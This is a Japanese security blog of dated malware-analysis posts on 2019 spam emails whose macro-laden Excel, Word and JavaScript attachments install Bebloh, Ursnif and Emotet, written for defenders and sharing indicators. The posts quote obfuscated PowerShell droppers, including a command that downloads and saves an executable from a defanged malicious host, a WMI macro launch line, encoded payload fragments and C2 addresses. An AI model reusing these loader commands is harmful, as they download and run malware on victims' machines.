2019/05/07(火) 添付ファイル付不審メールの調査
2019/05/07(火) にばらまかれた不審メールの調査について調査しましたのでブログに記載します。
※何か解析結果アップデートがありましたら、新規記事かこちらのページへ追記しようと思います。
<不審メール情報>
◾️文面
以下のリンクから確認することが出来ます。
https://www.cc.uec.ac.jp/blogs/news/2019/05/201905071615malwaremail.html
◾️件名
(有償)注文書
FW:(通知)
RE: 通関
【訂正版】
建材発注書です
転送された画像 - From:
【2019年5月】請求額のご連絡
◾️添付ファイル
xxxxx2019年5月.xls
※xxxxxは数字5桁
https://app.any.run/tasks/868d2631-fe21-4a13-9b73-35f39d4c2fbd
xxxxx.XLS
※xxxxxは数字5桁
https://app.any.run/tasks/3b5dc859-7c08-4111-b398-9fa0667c4bfe
<プロセスの動き(概要)>
Excel.exe → Wmic.exe→Powershell.exe → powershell.exe → explorer.exeとなります。
ExcelマクロからPowerShellが実行され、Stegano(Bebloh)を経由してUrsnifに感染すると推測されます。
※今回調査した解析環境では、Ursnifの感染までは確認出来ませんでした。
<エクセルファイル>
今回、添付されていたエクセルは以下の画像のもので、編集を有効にした際にマクロが実行されます。
マクロ実行後、以下の様な難読化されたPowerShellが実行されます。
<PowerShellの挙動>
Excelのマクロを経由し実行されるPowerShellは難読化された状態となっています。
powerShEll -W 1 -ExECutI BYPASS -nOPrOF -NOniNteR iex("\" .( `$SHeLlID[1]+`$SHelLiD[13]+'X') ( NEW-ObjEct IO.streamReAdeR*1.REaDtOEnd() "\")
難読化の内容までは解読できていませんが、外部の画像ファイル(hxxps://images2[.]imgbox.com/1b/a6/9pJo30dK_o [.]png)を取得しています。
※取得している画像ファイル
読み取った画像から ダウンローダ型マルウェアのbeblohのDLLファイルを作成し、ExplorerへDLLインジェクションしたと思われます。
DLLインジェクションですが、Windows Defenderのリアルタイム保護を有効にしている場合、スクリプトの途中で怪しいスクリプトと認識され、PowerShellの実行が停止し、Beblohの感染を防げることを確認しています(実際にExploererへインジェクションした様子もありませんでした)。
Windows Defenderを有効にしておくことで感染を防止することが可能です。
BeblohへのC2(hxxps://donersonma[.]com)宛への通信は発生しましたが、Ursnifへ感染こちらの環境では感染を確認することができませんでした。
<通信先>
・添付ファイルハッシュ値
SHA256
5CB85D5BC7BC3EB44C747915F1B26A8BD923D32A5290424EECCB64E750B0FBE9
SHA1
C837EF21F2D0AC10078E3DF1099B530D318E246C
MD5
498382FDC72DD468F1E4E5E3417F943E
・ステガノグラフィ
hxxps://images2.imgbox[.]com/1b/a6/9pJo30dK_o[.]png
hxxps://i.imgur[.]com/47xDq9v[.]png
Bebloh C2
hxxps://donersonma[.]com
Ursnif C2
hxxps://lidersonef[.]com/images/~
以上となります。
*1:NEW-ObjEct systEM.Io.cOMpRESSioN.DeFlAtESTreAM( [Io.MemoRySTREAM][SYstem.ConVert]::fROmBASe64STrING( 'PZpdi+7IdYX/SgsczhlsDVWl+gi+C8GKL4ax8QwGaRhykRikYGywJQgo+e9ez9pqwzRn
~省略~
WlrGf471hgCsdvksUirCfz6Oqy50WLpms4spcWZDvl7b70odvIM6+56Y16tirmGj+8u0Pv//u/PHrx5dpW+f7uJ79/PLxzcf//cvz8fWn/zr+7W8/f/346d//+v0f//SH6+df//rH351/+TH3r9zI/s9vr9/9cP3h/P4/vn7zzcev/lVf07//zz8f/wA=') "\" + ([Char]44).TOSTRiNg() +"\" [iO.COmprESsiON.ComprEsSiONmODE]::dECoMprESS ) )"\" + ([Char]44).TOSTRiNg() +"\"[SYSTem.tEXt.EnCodiNG]::AsCii
2019/04/15(月) 添付ファイル付不審メールの調査
本日(2019年4月15日)、Ursnifに感染するばらまきメールを観測しましたので、調査しました。
■件名
下記の件名でメールがばらまかれております。
Fw:
Fw:HR
Fw:list of employees to reduce
@taku888infinityさんが作成されている下記ファイルより参考にさせていただきました。
■添付ファイル
今回解析したファイルは、doc.doc.jsというjavascriptでした。.doc.jsということでwordファイルと偽装しようとしたjavascriptでしたが、アイコンはjavascriptのままでした。
-Sha1 72B39A2FAC64B2B3290D5B7C0321FC2A7E1CB8D1
■プロセスの動き(概要)
下記のとおり、Wscript->cmd->powershell->control.exe->rundll32.exeと動作しているがわかります。
■Powershellの動き
Powershellへの引数が下記のようになっていました。read.exeをLocal配下にTempbsK70.exeとしてダウンロードしていることがわかります。
powErshelL.eXe -executionpolicy bypass -noprofile -w hidden $var = New-Object System.Net.WebClient; $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('hxxp://instant-payments.ru/read.exe','C:\Users\shadow3\AppData\Local\TempbsK70.exe');
■read.exeについて(TempbsK70.exe)
read.exeのハッシュ値は下記のようになっていました。攻撃コードを作成し、RunDLL32を用いて呼び出しているものだと推測されます。
SHA1 45762C39DE64AB7ACECA9D6367129EC0CE37433D
■RunDLL32.exeについて
RunDLL32.exeの引数は次のようになっていました。
-Shell32.dll,Control_RunDLL /?
これよりShell32.dllに含まれるControl_RunlDLL関数を呼び出していることがわかります。Control_RunlDLL関数は、引数に作成したDLLを設定することで、対象のDLLをエントリポイントから実行させることが可能のため、攻撃コードを実効したものだとわかります。
(参考)rundll32.exeを悪用した命令の実行
https://binary-pulsar.hatenablog.jp/entry/2018/11/05/083000
asfe32gt.exeというファイルが自動起動として登録されていました。ハッシュ値は下記のようになっていました。上記のRead.exeと同一ハッシュであることがわかります。
SHA1 45762C39DE64AB7ACECA9D6367129EC0CE37433D
■情報摂取のために作成されるファイル(.binファイル)
%temp%配下に.binファイルが作成されており、下記のようにアクセスしたURLやPostデータが格納されていました。
さらに今回は、別タイプのファイルも存在し、下記のファイルではブラウザで入力した情報を盗むキーロガー用のファイルも作成されていました。
■インジェクションされたコードについて(まだ勉強中)
Process Monitorより.binファイルはExplorer.exeが作成していることがわかります。DLLインジェクションを行われたためだと考えられます。
Process HackerでExplorer.exeを参照したところ、書き込み権限および実行権限を付与された領域があったため、この部分(0x86d1000等)にコードを挿入(448KB分)されたものだと考えられます。実際にbinファイルが作られたときのスタックの動きを追ってみると、0x869d775にあるUnknownモジュールから、CreateFileやWriteFileが呼び出されていることが確認できました。
また、時間があるときに書き込まれたコードをOllydbg等を利用して、さらに分析したいと思います。
■.binファイルの送付先
こちらの環境で解析したところ、作成された.binファイルをC&Cサーバに送付している様子は見られませんでした。
■今回観測したIoC情報
SHA1 72B39A2FAC64B2B3290D5B7C0321FC2A7E1CB8D1
SHA1 45762C39DE64AB7ACECA9D6367129EC0CE37433D
hxxp://instant-payments[.]ru
以上となります、何か誤っている情報などありましたら、twitterで連絡してもらえると助かります。
2019/04/12(金) 添付ファイル付不審メールの難読化の調査
4/12に国内でばら撒かれたメールに添付されたWordファイルのマクロおよびPowerShellの難読化について調査しました。難読化自体は簡易的なものでしたが、調査方法のメモ代わりに記載しておこうと思います。
なお、解析するときはネットワークを遮断する、感染しても問題ない環境で行うなど、注意して解析をお願いします。
実際にマルウェアに感染することも想定されますので、意味が分からない場合は実施せず、解析を実施する場合も自己責任でお願いします。
1. Wordファイルのマクロについて
今回の添付されていた Wordファイルはマクロが仕込まれており、実行するとwmiprvse.exeによりPowerShell が実行されます。
マクロ自体はWordファイルを開いた後、「表示」>「マクロ」>「編集」から中身を確認することが出来ます。今回のマクロは「autoopen」と言う名前で登録されていました。
マクロは以下のような形式で難読化されています。
一見、複雑に難読化されているように見受けられますが、ほとんどが意味のない条件や変数となっています。これは、デバックのF8でステップインしていき、変数の中身や条件分岐の様子を見ることで確認することができます。
※実際に処理が実行されますので、注意してください。
※いくつかの変数を確認したところ、ほとんどの値が Emptyでした。
ダミーの多い中、攻撃に使われているものは以下の箇所となります。
<攻撃箇所>
GetObject("winm" + "gmts:Win32_Process").Create icAAZoX.VCAwAAB_.PasswordChar + BoUwUUXG.c_AAXoQB + icAAZoX.VCAwAAB_ + BoUwUUXG.BBXcQUD + icAAZoX.VCAwAAB_.ControlSource + icAAZoX.VCAwAAB_.PasswordChar + BoUwUUXG.ucAQAAUk + icAAZoX.VCAwAAB_.ControlTipText + icAAZoX.VCAwAAB_.ControlTipText + BoUwUUXG.OUUQACD + icAAZoX.VCAwAAB_.ControlTipText + BoUwUUXG.JkoAACxU + icAAZoX.VCAwAAB_.PasswordChar, pGDAA_, TA1_GU, icAAZoX.VCAwAAB_.ControlSource
実際には一部の変数に文字列が格納されており、見やすくすると以下のようになります。
<攻撃箇所>
GetObject("winmgmts:Win32_Process").Create powershell -e "JABCAEEAQQBaAFgAQQBEAD0AKAAiAHsAMQB9AHsAMAB9ACIALQBmACcAQQAnACwAKAAiAHsAMQB9AHsAMAB9ACIALQBmACcARABBACcALAAnAHQAYwB3ACcAKQApADsAJABMAGMAYwBRADEAQQAgAD0AIAAnADQAOAAwACcAOwAkAFoAeABjAHgAMQB4AEcAPQAoACIAewAwAH0AewAyAH0AewAxAH0AIgAtAGYAJwBPAEcAJwAsACgAIg ~省略~
本構文により、wmiprvse.exeを経由して、PowerShell を呼び出していると思われます。
2. PowerShell の難読化
1 で実行された Wordのマクロを経由して以下のスクリプトがPowerShellで実行されます。
<実行されるPowerShell>
PoWeRsHelL -e JABCAEEAQQBaAFgAQQBEAD0AKAAiAHsAMQB9AHsAMAB9ACIALQBmACcAQQAnACwAKAAiAHsAMQB9AHsAMAB9ACIALQBmACcARABBACcALAAnAHQAYwB3A ~省略~
powershell のオプションである -e はbase64 エンコードされた文字列をデコードするものであり、-EncodedCommand と同等のオプションとして扱われます。
-e 以降の文字列はBase64でエンコードされているため、デコードを行うと以下のようになります。
<Base64でのデコード後>
powershell -e $BAAZXAD=("{1}{0}"-f'A',("{1}{0}"-f'DA','tcw'));$LccQ1A = '480';$Zxcx1xG=("{0}{2}{1}"-f'OG',("{0}{1}" -f 'B',("{0}{1}"-f 'A','BGA')),'U');$zwBAAAQ=$env:userprofile+'\'+$LccQ1A+("{0}{1}" -f 'e','xe');$zQA_CB=("{0}{1}"-f'A',("{1}{0}"-f("{1}{0}" -f'BA','AZ'),'cX'));$VDw4ADUA=('new-obj'+'ec'+'t') NeTweBCLiEnt;$iQBAco=("{32}{22}{12}{4}{26}{9}{13}{29}{0}{20}{2}{27}{28}{6}{18}{23}{5}{35}{8}{21}{11}{34}{7}{1}{16}{17}{24}{36}{14}{10}{30}{33}{31}{15}{25}{3}{19}" -f ("{1}{0}"-f '@','RH/'),'q',("{1}{2}{3}{0}" -f ("{1}{0}" -f 'ico','m'),'p:','/','/fu'),("{4}{0}{5}{2}{1}{3}" -f'q',("{0}{1}"-f'P','Hsz'),'R',("{2}{0}{1}"-f'fF/d','w','-'),'s',("{2}{1}{0}" -
~省略~
難読化されていますが、配列を並び替えるだけの難読化となっています。通信先は $iQBAco 格納されているため、$iQBAco の箇所をPowershell で実行します。
その後、$iQBAco をecho コマンドで実行することで今回の通信先を確認することができます。
この通信先については バンキングマルウェアの解析をブログに書いている bomさんが記載されているものと同様になります。
https://bomccss.hatenablog.jp/entry/2019/04/13/033005
<通信先>
hxxp://aussiescanners[.]com/forum/1IXQRH/
hxxp://fumicolcali[.]com/wblev-6pox5-vpckk/4ih2/
hxxp://azedizayn[.]com/26192RX/qW/
hxxps://sundarbonit[.]com/cgi-bin/mlEH/
hxxp://aupa[.]xyz/hJPug-2q3uyQ3NsqIgkO_tdeRPHsz-fF/dwvK/
これ以降の動きはこのブログでも書いた通り、バンキングマルウェアのEmotetへ感染していきます。
https://bankingmalware.hatenablog.com/entry/2019/04/12/193744
何か誤っている情報などありましたら、twitterで連絡してもらえると助かります。
マクロおよびpowershell の難読化についての調査は以上となります。
2019/04/12(金) 添付ファイル付不審メールの調査
2019年4月12日の17時ごろからばら撒かれた不審メールについて解析してみました。
今回の不審メールはバンキングマルウェアのEmotetだと思われます。Emotetは2018年の11月から日本で確認されることが多くなりました。
■添付ファイル
・今回解析したファイルは、48e6b0c0b0707045ff76094c64908532.doc
https://app.any.run/tasks/f06af0db-2dab-4b60-8b2b-5306f2f0608c
添付ファイルを開いてコンテンツの有効化をクリックするとマクロが実行されます。
Sha1 C70E236F7828512AB9AB31C3F483DDE5E8CEFB8C
■プロセスの動き
〈Powershell実行からC2サーバへの通信まで〉
下記のとおりPowershell起動後、480.exeおよびiellguiddef.exeが起動することがわかります。480.exeはiellguiddef.exe起動後に、ファイルごと消去されます。iellguiddef.exeは自動起動になるようにレジストリに登録され、ハッシュ値は以下です。
Sha1 5691B46FF92169EA7AF91EBC8F2C9584AB5505AD
- Powershell起動後のプロセスフロー
■Powershellの通信先
ProcessMonitorおよびBurpSuiteを利用して、Powershellが下記と通信していることがわかりました。
17:25:35 aussiescanners.com
17:25:37 fumicolcali.com
fumicolcali.com/wblev-6pox5-vpckk/4ih2/にアクセスした後、
下記のハッシュ値を持つexeがダウンロードされることを確認できました。
SHA1 1440671ED594A7D91B425B8C83E01FC63FC6911B
■ iellguiddef.exeの通信先
同様の方法でiellguiddef.exeの通信先も下記のようにわかりました。しかし、iellguiddef.exeはいくつかの通信先を持っており、他にも通信先があると思います。今回はC2への通信が成立したため、他のC2サーバへは通信していないと思われます。
(Post1回目)
hxxp://187.188.166[.]192/splash/symbols/ringin/
・PostData
Vyq0Is7j9ckoOErZJ%2ByJqni6qWSojwqREBP2knsy6bftRoZsG2BfR5Ov9QEJcn03esM4zCFRkWiHkeMkPPVg9GVwYZjb4wE20SMhYAmuA%2BlAduGmvpDYbLxLSupiIddXFmSLGPTE7YV6TEqpg%2FBXWVC3Oanc12Fh%2B5sHPoo5yec%2FPGmNOZhMDiQP7jpwyJI31cdnnGe86qpt~中略~2FgckqQBLdEaVMRjgXbUabNvJj1vt37K4cCnOwVlES2sjGA7zQraqbTcs008tsedanAo0oSLrPXx99G8IODtifev78KewDtNhMFC023riWjgAN2h9Cg6iV4vCTcfFsLMQq8STGui%2BHkbQ7n0rnxcQbulN%2F9CiiuOYpSGkWwKbbgVsqGieko6AEaZmlISM%3D
(Post2回目)
hxxp://187.188.166[.]192/devices/entries/nsip/
・PostData
Vyq0Is7j9ckoOErZJ%2ByJqni6qWSojwqREBP2knsy6bftRoZsG2BfR5Ov9QEJcn03esM4zCFRkWiHkeMkPPVg9GVwYZjb4wE20SMhYAmuA%2BlAduGmvpDYbLxLSupiIddXFmSLGPTE7YV6TEqpg%2FBXWVC3Oanc12Fh%2B5sHPoo5yec%2FPGmNOZhMDiQP7jpwyJI31cdnnGe86qptbNYuE24MAE1svA%2Fyz4u9C0rfUVEBGhwVYoPyEOtpNJo%2B%2FHiiPgFqWMKUFpbgr4ujsbDO256sZ2holiYMug3fqenn8olqtg%2FYUt6xSKCKoQq4vuEHE2r5jW~中略~ Jj1vt37K4cCnOwVlES2sjGA7zQraqbTcs008tsedanAo0oSLrPXx99G8IODtifev78KewDtNhMFC023riWjgAN2h9Cg6iV4vCTcfFsLMQq8STGui%2BHkbQ7n0rnxcQbulN%2F9CiiuOYpSGkWwKbbgVsqGieko6AEaZmlISM%3D
POSTにて送られたデータはURLエンコードとBase64にてエンコードに加えて、
暗号化されていると思われ、通信しているデータについては確認できませんでした。
2019/04/10(水) 添付ファイル付不審メールの調査
昨日(2019年4月10日)beblohに感染する日本語のばらまきメールを観測しましたので、調査しました。
■添付ファイル
ファイルの内容は下記のようになっています。コンテンツの有効化をクリックするとpowershellが起動します。
ファイル名 (1)._____.6160
SHA256: 9dc6974b2e288fbeff404c6883cd1cf9ab4418b9f2bf43887f0ca5915d791a3d
https://www.virustotal.com/#/file/9dc6974b2e288fbeff404c6883cd1cf9ab4418b9f2bf43887f0ca5915d791a3d/details
■通信先
powershellが下記ipと通信していることが確認できました。
-151[.]101.40.193 (i[.]imgur.com)
実際にBurp Suiteで i[.]imgur.com のURLを確認したところ、以下の画像ファイルをダウンロードしていました。
ダウンロードされる画像ファイル:
hxxps://i[.]imgur.com/fC5Pcd2[.]png
※ステガノグラフィの手法を利用して、Powershellのスクリプトをダウンロードしていると推測されます。
参考:
https://blog.trendmicro.co.jp/archives/19812
https://pastebin.com/rrxZ2F7i
今回、ダウンロードされる画像はスーパーマリオのフラワーでした。
補足:
Burp Suiteですが、初期の段階だと「Proxy」の「HTTP history」に表示される情報にフィルターがかかっているため、「Fillter. Hiding ....」と書かれている検索ウインドウをクリックし、「Filter by MIME type」で解析に必要なものにチェックを入れる必要があります。今回の場合、Imagesにチェックが入っていないため、Imagesにチェックをいれないと i[.]imgur.com宛の通信が表示されないので注意が必要です。
■解析1 プロセスの動き
下記のとおり、excel -> cmd.exe -> WMIC.exeと起動していることがわかります。そして、WMIC.exeがpowershellを起動していることがわかりました。
-WMICを経由したpowershellの呼び出し
次に下記のとおり、wmiprvse.exe経由でpOWersheLL.exeが実行されることが確認できます。
その後、下記のように再びpowershell.exeを起動した後、pOWersheLL.exeは終了します。
その後、powershell.exeはsysWOW\explorer.exeの起動を行っていました。Explorer.exeのdllインジェクションを行うためと思われます。また、理由は不明ですが、powershell.exeと同じPID(1884)でcmd.exeが動き、systeminfo等を起動し、情報収集していることが確認されました。
続いて、qisaadshtw.exeが起動し、explorer.exeを子プロセスとして起動し、qisaadshtw.exeはファイル毎消滅します。explorer.exeをdllインジェクションするためと思われます。その後、explorer.exeとmakecab.exeにより、%temp%配下に.binファイルの名前でcabファイルが作成されていることが確認できました。
■レジストリ書き換え
Autorunを利用して自動起動のレジストリを確認したところ、下記の実行ファイルが自動起動となるように修正されていました(普通に起動すると、下記のexe起動後にレジストリを書き換えられるため、セーフモードで起動する必要があります。)。
asfe32gt.exe
SHA1 da904780b5f63d3611c1c35da1c84b1d52cc0c10
※検体のハッシュ値は環境ごとに異なるものとなります。
https://www.virustotal.com/ja/file/7d6274fb58509385888b0e882c0b46c8b37fea1acf2adbaf81cdc8cf8f8cdad9/analysis/1554954089/
■.binファイルの中身
.binの中身は下記のようになっています。最初は下記のように、ホストの情報を書き込んでいることがわかりました。その後、ブラウザでアクセスしたURLやCookie、postデータ等を書き込んでいることが確認取れました。ただし、POSTデータはbase64でのエンコードおよび暗号化がされており、解読はできませんでした。
■.binファイルの送付先
Burpsuiteを利用して、通信先を解析してみたところ、下記のあて先に先ほどのbinファイルを送付していることが確認できました。①は最初に発生する通信であり、通信先は固定であると思われます。②、③起動するたびにあて先が変わるようなので、自動起動でasfe32gt.exeが実行されるときに、あて先が決まるのかと推測されます。
①hxxps://omnifoxt[.]com
※最初にbinファイルで感染端末の情報を送信していると思われます。
②hxxps://fibergon[.]com
③hxxps://pilodima[.]com
■今回観測したIoC情報
・hxxps://i[.]imgur.com/fC5Pcd2[.]png (151[.]101.40.193)
→ステガノグラフィ
・hxxps://omnifoxt[.]com
・hxxps://fibergon[.]com
・hxxps://pilodima[.]com
以上となります。
2019/04/03(水) 添付ファイル付不審メール(bebloh/ursnif(A))の解析
2019年4月3日でばらまかれた不審メールを解析してみました。解析方法の整理をかねて、解析結果を今後投稿していこうと思います。まだマルウェア解析歴が浅いため間違っている部分はあるかもしれませんが、その際はコメントを頂ければ幸いです。
■添付ファイル
・文書名 -scan-nnnn.xls
※nnnnは数字4桁
https://www.virustotal.com/#/file/a5294a62b4cd9eae6d53816f8335d4e4aa9e48e3947621383658ca595bea4da6/details
SHA-256 a5294a62b4cd9eae6d53816f8335d4e4aa9e48e3947621383658ca595bea4da6
コンテンツの有効化をクリックするとマクロが実行されます。
■ 解析1<Excelのマクロ起動からPowershell起動まで>
Excel.exeのマクロにより、子プロセスとして、ELZQRKV.exeを作成・起動されます。ELZQRKV.exeはpowershellであることがわかりました。その引数として、難読化されたコードを渡されていました。
■ 解析2. VBAの難読化されたコード解析
olelvbaを利用して、VBAのコードを抽出してみました。難読化されており、完全な解析は困難ですが、powershellをコピーおよびshell関数を利用し、難読化したコードを引数にpowershellを呼び出していることが確認されました。
# olevba --reveal ファイル名
■ 解析3. Powershellの難読化されたコード解析
下記の赤字部分からBase64によるエンコードおよびDeflateアルゴリズムにより圧縮されていることがわかるため、Pythonを利用してコードの難読化を解除します。
<難読化されたPowershellのコード>
& ( ${pSh`O`mE}[21]+${P`s`HOme}[30]+'x')(.(\"{0}{1}{2}{3}\"-f'NeW-','O','B','Ject') (\"{5}{4}{2}{1}{3}{0}\" -f 'prEssion.DefLaTestReAM','io.cO','.','M','STEM','sy')([Io.mEMoRYstREam] [coNVerT]::FROmbaSE64StrInG('ZZpBj+S2EYX/Sh+c7hnAG1QZSQ7bFwXGInLgbAdrwxdjoU...756fn//3zF9z/R8='), [sYsteM.IO.COMPrEssiON.coMPresSiOnMoDe]::dECOMpRess ) | .('%'){ .(\"{0}{2}{1}\" -f 'N','t','eW-OBJec') (\"{1}{2}{5}{0}{3}{4}\"-f'aMrEAD','SYstE','M.io.sT','e','R','rE')(${_}, [SYStEM.tExT.enCoDiNg]::ASCII)} |.('%'){${_}.rEadtoeNd()})
・難読化解読Pythonコード
import base64
import zlib
tmp = 'ZZpBj+S2EY...(上のBase64でエンコードされた部分)'
decoded = base64.b64decode(tmp) #base64でデコード
decompressed = zlib.decompress(decoded, -15) # Deflateで復元
print(decompressed.decode("utf-8"))
上記のとおり、2進数で書かれたコードが確認されました。区切り文字を削除して、Asciiコード変換機を利用して、2進数を文字列に変換すると下記のようになりました。
再び、Base64およびDeflateアルゴリズムにより圧縮されていることがわかるため、もう一度Pythonを利用してコードの難読化を解除します。
ようやく、悪意のあるコードを複合できました。上のコードを整形すると下記のようになります。コメントアウトはこちらで付け加えた部分ですが、黄色の部分のとおり、https://gerdosan[.]com/uploads/changed.pdfのpdfファイルを開こうとしていることがわかりますが、今はサーバを落とされているため、失敗となりました。これ以降の流れは、下記のページで分析されています。
https://bomccss.hatenablog.jp/entry/2019/04/04/035229
■ (参考)解析4. Ursnifの解析
上記で記載した通り、changed.pdfは落ちてこなかったので、直接検体をダウンロードして、解析してみました。
Sha1 2611A2F1A57AB415C11733A80FE92DA843E5AEE5
下記のとおり、Ursnif.exeの子プロセスとして、explorer.exeが実行されていることがわかります。これはexplorer.exeにdllインジェクションされたのだと推測されます。
Explorer.exeが起動された後、複数のcmd.exeが起動されたことが確認できます。
Cmd.exeの動きを追ったところ、%TEMP%配下に8175.binというファイルを作成・書き込みを行っていることがわかりました。%TEMP%を確認したところ、8175.binというファイルはありませんでしたが、6E44.binというファイルがありました。バイナリエディタで確認したところ、このファイルはCABファイルであることがわかりました。
拡張子を.cabに変換し、解凍したところ、ようやく8175.binを抽出できました。テキストエディタで確認したところ、下記のようにマシン情報(ホスト名やレジスタ情報など)が格納されていたことがわかりました。
今回の解析ではこれ以上の動きが確認できませんでした。おそらくC2等が動作していると、C2へ8175.binの送付およびブラウザの入力内容も%TEMP%配下に格納されるものと推測されます。